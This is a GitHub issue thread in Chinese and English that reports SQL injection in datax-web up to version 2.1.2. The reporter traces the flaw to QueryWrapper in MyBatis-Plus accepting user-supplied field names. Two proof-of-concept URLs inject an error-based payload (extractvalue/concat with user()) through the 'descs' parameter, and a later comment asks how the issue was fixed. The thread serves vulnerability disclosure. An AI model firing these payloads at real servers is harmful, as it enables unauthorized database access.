### ISSUE TITLE
Incorrect call to mybatis-plus resulting in SQL injection in the backend

### ISSUE THREAD

**Issue by 123456qwa** [WeiYe-Jing/datax-web#627]
版本号：
v-2.1.2以及之前的所有版本
问题描述：
在mybatis-plus的安全漏洞避免说明(https://www.baomidou.com/pages/110sec/) 中可以看到，该项目中利用 QueryWrapper 允许字符串传入字段名，导致sql注入。

Instructions for avoiding security vulnerabilities in mybatis plus（ https://www.baomidou.com/pages/110sec/ ）As can be seen from, the use of QueryWrapper in this project allows strings to be passed into field names, resulting in SQL injection.

![image](https://github.com/WeiYe-Jing/datax-web/assets/79497377/b4b6e761-5d8b-45e2-a880-92cc80d58931)

截图&代码：
![image](https://github.com/WeiYe-Jing/datax-web/assets/79497377/74eb97ff-266b-45fd-ad92-c24027f6794c)

![image](https://github.com/WeiYe-Jing/datax-web/assets/79497377/236a3520-63ef-4655-b4ef-16772494bf08)

SQL Injection
URL：http://localhost/api/jobRegistry?descs=1+and+extractvalue(1,concat(char(126),user()))
http://localhost/api/jobJdbcDatasource?descs=1+and+extractvalue(1,concat(char(126),user()))
![image](https://github.com/WeiYe-Jing/datax-web/assets/79497377/967cad86-54d8-4c22-9dab-539447e29ea2)

**Comment by colin354** [comment]
hi, 我遇到了相同的sql注入问题，请问最后如何解决的呢？
